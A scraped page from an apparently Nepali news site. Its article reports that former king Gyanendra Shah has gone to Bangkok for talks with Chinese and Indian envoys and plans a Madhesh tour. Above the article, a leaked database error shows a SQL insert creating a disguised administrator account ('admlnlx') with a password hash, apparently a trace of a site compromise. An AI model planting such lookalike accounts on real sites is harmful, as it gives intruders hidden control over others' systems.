WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwPKwHz5bS3rTuyjAGf5s4RY..m6Lr1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 06:49:34', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २६-
पूर्व राजा ज्ञानेन्द्र शाह विशेष राजनीतिक संवादका निम्ति गत साता थाइल्याण्डको राजधानी बैंकक पुगेका छन् । गत बुधबार माघ १९ गते साँझ चिनीया राष्ट्रपति सी जिनपिङका विशेष प्रतिनिधिसँग रात्रीभोजसहितको भेटवार्तापछि उनी बैंकक प्रस्थान गरेका हुन् ।
शाहले त्यहाँ चीन र भारतका विशेष दूतहरुसँग बेग्लाबेग्लै भेटवार्ता गर्ने समाचार सूत्रहरुले जनाएका छन् । बैकक जानुअघिका केहि दिनभित्र उनले नेपालमा केही राजनीतिक दलका नेताहरुसँग पनि परामर्श गरेकाे पनि बुझिएको छ । उनी २७ या २८ गते स्वदेश फर्कने बताइएको छ ।
राजसंस्थाको भविष्यबारे ज्ञानेन्द्र शाह निर्णायक वार्तालापको चरणमा प्रवेश गरेका छन् । अबका वार्तालाप तथा बैठकहरुले कुनै न कुनै रुपको ठोस परिणाम हासिल हुने आशा उनले गरेका छन् । राजसंस्थाले स्पेस पाउने या नपाउने भन्ने कुराको निक्र्योल गरिसकेपछि शाहबाट ठोस कदम चालिने बताइएको छ ।
बैंककबाट फर्किएपछि सपरिवार मधेसको विशेष भ्रमणमा जाने स्रोतको जानकारी छ । उनी आगामी फागुन ५ गते बाराको सिमरा पुग्नेछन् । फागुन ७ गते पूर्व बडामहारानी कोमलको ६७ औं जन्मदिन सिमरामै मनाएपछि सिमरालाई मुकाम बनाएर उनी तराइ मधेसका केही जिल्लाको भ्रमणमा जाने बुझिएको छ । घटना र विचार साप्ताहिकमा खबर छ ।